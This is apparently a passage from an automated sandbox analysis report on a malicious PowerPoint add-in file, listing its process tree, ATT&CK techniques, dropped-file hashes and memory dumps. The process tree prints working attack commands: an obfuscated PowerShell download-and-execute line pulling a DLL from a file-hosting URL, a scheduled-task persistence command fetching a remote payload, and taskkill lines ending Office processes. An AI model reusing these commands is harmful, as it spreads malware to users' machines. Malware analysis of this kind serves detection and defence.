"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
3⤵
PID:4104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5176

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5928 /prefetch:8
3⤵
PID:5236

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5392 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6176 /prefetch:1
3⤵
PID:5388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
3⤵
PID:5404

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Downloads\14 (1).ppam" /ou ""
3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5572

C:\ProgramData\ddond.com
C:\ProgramData\ddond.com https://taxfile.mediafire.com/file/v9m1dw47xgtetw9/14.htm/file
4⤵
- Executes dropped EXE
PID:4992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/ivgr6qe4jfzd1w9/14.dll/file'))));Invoke-Expression $MMMMMMM
5⤵
PID:804

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 82 /tn calendersw /F /tr """C:\ProgramData\milon.com""""""https://www.mediafire.com/file/8pmejv253qhljtn/14.htm/file"""
5⤵
- Creates scheduled task(s)
PID:3180

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im WinWord.exe
5⤵
- Kills process with taskkill
PID:5860

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Excel.exe
5⤵
- Kills process with taskkill
PID:5928

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im POWERPNT.exe
5⤵
- Kills process with taskkill
PID:3828

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Downloads\14 (1).ppam" /ou ""
3⤵
PID:5732

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5472 /prefetch:8
3⤵
PID:5756

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
3⤵
- Drops file in Program Files directory
PID:5808

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff759d75460,0x7ff759d75470,0x7ff759d75480
4⤵
PID:5924

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Downloads\14 (1).ppam" /ou ""
3⤵
PID:6016

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Downloads\14 (1).ppam" /ou ""
3⤵
PID:6084

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5472 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5360

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" /PRODUCT:Reader /VERSION:19.0 /MODE:3
2⤵
- Suspicious use of SetWindowsHookEx
PID:5176

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"
3⤵
PID:4000

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:5348

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ddond.com
Filesize
14KB

MD5
0b4340ed812dc82ce636c00fa5c9bef2

SHA1
51c97ebe601ef079b16bcd87af827b0be5283d96

SHA256
dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

SHA512
d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

Download Submit
C:\ProgramData\ddond.com
Filesize
14KB

MD5
0b4340ed812dc82ce636c00fa5c9bef2

SHA1
51c97ebe601ef079b16bcd87af827b0be5283d96

SHA256
dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

SHA512
d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6
Filesize
471B

MD5
1fca0539de02091fc4d207211364e566

SHA1
61a6af3a2153a70277b7de7495ecef4110bb9989

SHA256
e6a9491850b7d6fc6bd7d592a8ff4fc057952a137abb7d3d39b3d0bb3b8f667b

SHA512
a1a657812f96ef839d793ffb6f249765ed24e906f5b3a22872c52e5b687480fdd7cc2334956e42198d70fa931f77ef50cbc8e1aaae6959ba3036a9035eeea823

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
Filesize
471B

MD5
61bbc21b6075c76df0e0ed177c534185

SHA1
efcec703b65ae25e95736755f0fd80cdb5569c13

SHA256
0c2f98b4f41006d5bee3534e07ff7047cffd42c7f53f4ce6861d458e96457164

SHA512
a31af35f8fb5a566fa02c40156693db6ba54d75b8a3e3acac65cbc9e1d4eb9ea627f395bacfb3ac0b9854d9ef29f0e16ea958ebfe8201cff70096ff90ef61727

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE
Filesize
471B

MD5
c6f11751f23f273c02be06f64ca0e2f2

SHA1
43dd2140da95c53f964ef88db67187451581625f

SHA256
063e20533cd1e709c8c1965ccd1cfbff2b3c6a37683f03a244da1a5101a3bc81

SHA512
23e69bede2c1fee2f559f00aeb69c122f4c987c76d6455fa1ff484dc23008566b02edd93ee6a57c179c71e71114a0638c948900b4fff5b731ff99e81cbeae001

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6
Filesize
434B

MD5
6756c40edf649ec888c0e888446cacb9

SHA1
59ad25a4a9ff545995b5bcce1abd411e7f07060a

SHA256
794f4be6bac263da5983ef90891f923230f14f15b4c68b60c2248b834f0526d2

SHA512
af6022b791d65c83d50205c498dd8fd76d70e8cf7563b373024fd9887b8d9400d4b6cfd7cd72084a94447127afc1e1a3de28984af5eef1ae2a2ef182354a1ac9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
Filesize
442B

MD5
bfa52515350fe02ef978aed07e758049

SHA1
95972681781c46b22c5adc90bffed1e94f09d64c

SHA256
d584b8348f562647b43f0769750b05bafe94194188fe695aea3b1fff3c334eff

SHA512
28ba9afed478d4ab4f413de12040b27d7966eaa6958b96fa57bf430ad4a95f94cf3866f7a5e6e44b559ca5b30d383b26248d10ecdf5232194c786ef79f9f3245

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE
Filesize
446B

MD5
4dd1120e370440f036f0ff39feb41deb

SHA1
e715b0fd2932db814e29c1b55fb8b690970812d9

SHA256
17a92d4c5dd525dd6f795b9bd6428a6047f60e0515b939d39218ee740cd550be

SHA512
e4fae14b67ea0351d6cb18a84d95b13aa7bd1bddeed4f7da536afb9e336615c20416f8a6181a8c8538a4f33da1a1ff3ceb6facd576f8bffd37aab5115fd08903

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
0f2fd3ffef216b4a9345a3bf7c19e54c

SHA1
bb53767f6009d83c4af27ddb9f72b88d2dea8c1c

SHA256
4587b60ec8ed42f34c0c85604a70363bd7e82b5dac6b6e14629e3a5672b3e98a

SHA512
5987b7af8b369ad6208688a59562c6d187b45a64cc307af5d96da4cbfc6c146c71bcc493f9a66bf23d2d249416222bb728e9072a44a7d9a13355647768b32900

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
0f2fd3ffef216b4a9345a3bf7c19e54c

SHA1
bb53767f6009d83c4af27ddb9f72b88d2dea8c1c

SHA256
4587b60ec8ed42f34c0c85604a70363bd7e82b5dac6b6e14629e3a5672b3e98a

SHA512
5987b7af8b369ad6208688a59562c6d187b45a64cc307af5d96da4cbfc6c146c71bcc493f9a66bf23d2d249416222bb728e9072a44a7d9a13355647768b32900

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
0f2fd3ffef216b4a9345a3bf7c19e54c

SHA1
bb53767f6009d83c4af27ddb9f72b88d2dea8c1c

SHA256
4587b60ec8ed42f34c0c85604a70363bd7e82b5dac6b6e14629e3a5672b3e98a

SHA512
5987b7af8b369ad6208688a59562c6d187b45a64cc307af5d96da4cbfc6c146c71bcc493f9a66bf23d2d249416222bb728e9072a44a7d9a13355647768b32900

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
95e22ee8bac6765a868c13fc5ca5017c

SHA1
dff7d454639c700bb4408bf2cef900337977eb56

SHA256
cb320ebc79962dfd60205d687132b62ac884924f6cf5c5a40aea28fd2bc44802

SHA512
47fb43256f59834aaf626e3c9c9e20f71afbb018f64755d8e05f6cbd8dde21e1c14049192a90bffd99413a58a0cacebdd8bce7b3d464aa622d7eefad71145428

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
95e22ee8bac6765a868c13fc5ca5017c

SHA1
dff7d454639c700bb4408bf2cef900337977eb56

SHA256
cb320ebc79962dfd60205d687132b62ac884924f6cf5c5a40aea28fd2bc44802

SHA512
47fb43256f59834aaf626e3c9c9e20f71afbb018f64755d8e05f6cbd8dde21e1c14049192a90bffd99413a58a0cacebdd8bce7b3d464aa622d7eefad71145428

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
95e22ee8bac6765a868c13fc5ca5017c

SHA1
dff7d454639c700bb4408bf2cef900337977eb56

SHA256
cb320ebc79962dfd60205d687132b62ac884924f6cf5c5a40aea28fd2bc44802

SHA512
47fb43256f59834aaf626e3c9c9e20f71afbb018f64755d8e05f6cbd8dde21e1c14049192a90bffd99413a58a0cacebdd8bce7b3d464aa622d7eefad71145428

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
1c3983e2604936fa4420627b5fdcb6f5

SHA1
83991de09f6bae339679274f874188ff154d72f8

SHA256
6762e25a87c7acf43482319e524c55a25550d898762b78972f5771903697176c

SHA512
2e943097f3c98ba2591ea467effb4314025222c3bc4a10effc875cb0bba7899be7b09e2777a144854f3093d47cbde49d3a0d96ff06e674341d26f4af41290c4a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings
Filesize
81B

MD5
f222079e71469c4d129b335b7c91355e

SHA1
0056c3003874efef229a5875742559c8c59887dc

SHA256
e713c1b13a849d759ebaa6256773f4f1d6dfc0c6a4247edaa726e0206ecacb00

SHA512
e5a49275e056b6628709cf6509a5f33f8d1d1e93125eaa6ec1c7f51be589fd3d8ea7a59b9639db586d76a994ad3dc452c7826e4ac0c8c689dd67ff90e33f0b75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1
Filesize
126KB

MD5
6698422bea0359f6d385a4d059c47301

SHA1
b1107d1f8cc1ef600531ed87cea1c41b7be474f6

SHA256
2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1

SHA512
d0cdb3fa21e03f950dbe732832e0939a4c57edc3b82adb7a556ebd3a81d219431a440357654dfea94d415ba00fd7dcbd76f49287d85978d12c224cbfa8c1ad8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris
Filesize
40B

MD5
95878acc2f35f7e0cab25eafa5a0015d

SHA1
e673cb8e7108c1df1e1f6c6dd038bdfae0b640af

SHA256
b732281984e203f7511780bc3622d4d96dcb1fad3c8bac69077572e16f71c1ff

SHA512
4e26bf0ba35e4a8900bd264527242a6e015d786b3c5a470188058097be68f55f7c8b8aaca607f2b8e0cf3b5caea80b4a1c12125ffe163ec4ebdaec6fb9079965

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris_637884115190248201
Filesize
8KB

MD5
d8d19e98fc8a233efa5c1792813ed8b2

SHA1
3126b9b3144b2bb299930fa500408de8bf383827

SHA256
624e7f0f1df15e5dba4b8189a40d15949b143fb7ef866e26d76524bd5a1df3d1

SHA512
e09b774c107b8a1ab78cc4695e4690c54c80df8df8a13a1d2abac986ad0c309d3ed81f4e697d72054b6f5590ef01a7604f3d202096b12d69c92d860cd5cd9343

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTraffic
Filesize
29B

MD5
ce545b52b20b2f56ffb26d2ca2ed4491

SHA1
ebe904c20bb43891db4560f458e66663826aa885

SHA256
e9d5684e543b573010f8b55b11bf571caf0a225cdea03f520091525978023899

SHA512
1ea06c8e3f03efdd67779969b4cdf7d8e08f8327298668a7cffd67d1753f33cf19e6995a3d83fe45185c55b950f41e48ac71b422b91e8d0180b5bdd07cfacfe9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTraffic_637811103879324684
Filesize
450KB

MD5
a7aab197b91381bcdec092e1910a3d62

SHA1
35794f2d2df163223391a2b21e1610f14f46a78f

SHA256
6337fe4e6e7464e319dfcdadf472987592013cf80d44916f5151950b4a4ca14b

SHA512
cffd7350d1e69ada5f64cafe42a9d77e3192927e129f2903088b66b6efc9626b5d525aedca08d473ad8fa415af1d816594b243609237dc23716d70a2ca0eb774

Download Submit
C:\Users\Admin\AppData\Local\Temp\6647D6D.tmp
Filesize
76B

MD5
0479715df4c22e9a75db1e132e8e9f74

SHA1
c7daced7176bb34f6839e1ee91f207c5359b05eb

SHA256
46759208a69138d6448963ca068b9e8328dd02896ceb1743489e3b9df36d448e

SHA512
e3365ec38729b8f47b88b0e64f2fe438c3402001920c6ad3ed53f8b93b4d8f3acd997c553b584572c0a697febb2da0aebf7d4f43a146c7330a47969644981501

Download Submit
C:\Users\Admin\AppData\Local\Temp\7807D6D.tmp
Filesize
76B

MD5
0479715df4c22e9a75db1e132e8e9f74

SHA1
c7daced7176bb34f6839e1ee91f207c5359b05eb

SHA256
46759208a69138d6448963ca068b9e8328dd02896ceb1743489e3b9df36d448e

SHA512
e3365ec38729b8f47b88b0e64f2fe438c3402001920c6ad3ed53f8b93b4d8f3acd997c553b584572c0a697febb2da0aebf7d4f43a146c7330a47969644981501

Download Submit
C:\Users\Admin\AppData\Local\Temp\7C47D6D.tmp
Filesize
76B

MD5
0479715df4c22e9a75db1e132e8e9f74

SHA1
c7daced7176bb34f6839e1ee91f207c5359b05eb

SHA256
46759208a69138d6448963ca068b9e8328dd02896ceb1743489e3b9df36d448e

SHA512
e3365ec38729b8f47b88b0e64f2fe438c3402001920c6ad3ed53f8b93b4d8f3acd997c553b584572c0a697febb2da0aebf7d4f43a146c7330a47969644981501

Download Submit
C:\Users\Admin\Downloads\14 (1).ppam
Filesize
41KB

MD5
66367046957810309248fcec536d7ccb

SHA1
5a118ce3f251140e852927503a3743442c68ff63

SHA256
26c3bd6b866dd452546949e169dfd0934cf53681fe53d63efa2a16db39cf131b

SHA512
1698fc41e4fe3bfd61841e9ec50a2461583d58cc5fafb00fb3c6a31460b0b866a7c96762da22de840f2081fb8524808e0177697860582aed6b33365a62f1fd08

Download Submit
\??\pipe\LOCAL\crashpad_3484_KRNRFHMUSJHCEHAB
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_4500_JKXGEPWAYAAQMAIN
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/216-130-0x0000000000000000-mapping.dmp

Download
memory/804-265-0x0000000000000000-mapping.dmp

Download
memory/1188-167-0x0000000000000000-mapping.dmp

Download
memory/1296-180-0x0000000000000000-mapping.dmp

Download
memory/1348-153-0x0000000000000000-mapping.dmp

Download
memory/1472-141-0x0000000000000000-mapping.dmp

Download
memory/1592-142-0x0000000000000000-mapping.dmp

Download
memory/1720-188-0x0000000000000000-mapping.dmp

Download
memory/1748-168-0x0000000000000000-mapping.dmp

Download
memory/2004-182-0x0000000000000000-mapping.dmp

Download
memory/2836-186-0x0000000000000000-mapping.dmp

Download
memory/3064-147-0x0000000000000000-mapping.dmp

Download
memory/3120-156-0x0000000000000000-mapping.dmp

Download
memory/3180-266-0x0000000000000000-mapping.dmp

Download
memory/3484-133-0x0000000000000000-mapping.dmp

Download
memory/3612-165-0x0000000000000000-mapping.dmp

Download
memory/3648-132-0x0000000000000000-mapping.dmp

Download
memory/3828-269-0x0000000000000000-mapping.dmp

Download
memory/3828-150-0x0000000000000000-mapping.dmp

Download
memory/4000-184-0x0000000000000000-mapping.dmp

Download
memory/4000-236-0x0000000000000000-mapping.dmp

Download
memory/4104-192-0x0000000000000000-mapping.dmp

Download
memory/4336-136-0x0000000000000000-mapping.dmp

Download
memory/4500-155-0x0000000000000000-mapping.dmp

Download
memory/4680-190-0x0000000000000000-mapping.dmp

Download
memory/4776-166-0x0000000000000000-mapping.dmp

Download
memory/4992-256-0x0000000000000000-mapping.dmp

Download
memory/5176-235-0x0000000000000000-mapping.dmp

Download
memory/5176-193-0x0000000000000000-mapping.dmp

Download
memory/5236-195-0x0000000000000000-mapping.dmp

Download
memory/5252-196-0x0000000000000000-mapping.dmp

Download
memory/5360-230-0x0000000000000000-mapping.dmp

Download
memory/5388-199-0x0000000000000000-mapping.dmp

Download
memory/5404-201-0x0000000000000000-mapping.dmp

Download
memory/5572-237-0x00007FFB3EDB0000-0x00007FFB3EDC0000-memory.dmp

Filesize
64KB

Download
memory/5572-204-0x0000000000000000-mapping.dmp

Download
memory/5572-231-0x00007FFB3EDB0000-0x00007FFB3EDC0000-memory.dmp

Filesize
64KB

Download
memory/5572-215-0x00007FFB41170000-0x00007FFB41180000-memory.dmp

Filesize
64KB

Download
memory/5572-213-0x00007FFB41170000-0x00007FFB41180000-memory.dmp

Filesize
64KB

Download
memory/5572-211-0x00007FFB41170000-0x00007FFB41180000-memory.dmp

Filesize
64KB

Download
memory/5732-248-0x00007FFB41170000-0x00007FFB41180000-memory.dmp

Filesize
64KB

Download
memory/5732-209-0x00007FFB41170000-0x00007FFB41180000-memory.dmp

Filesize
64KB

Download
memory/5732-205-0x0000000000000000-mapping.dmp

Download
memory/5732-239-0x00007FFB41170000-0x00007FFB41180000-memory.dmp

Filesize
64KB

Download
memory/5732-245-0x00007FFB41170000-0x00007FFB41180000-memory.dmp

Filesize
64KB

Download
memory/5732-242-0x00007FFB41170000-0x00007FFB41180000-memory.dmp

Filesize
64KB

Download
memory/5732-220-0x00007FFB41170000-0x00007FFB41180000-memory.dmp

Filesize
64KB

Download
memory/5808-206-0x0000000000000000-mapping.dmp

Download
memory/5860-267-0x0000000000000000-mapping.dmp

Download
memory/5924-207-0x0000000000000000-mapping.dmp

Download
memory/5928-268-0x0000000000000000-mapping.dmp

Download
memory/6016-208-0x0000000000000000-mapping.dmp

Download
memory/6084-216-0x0000000000000000-mapping.dmp

Download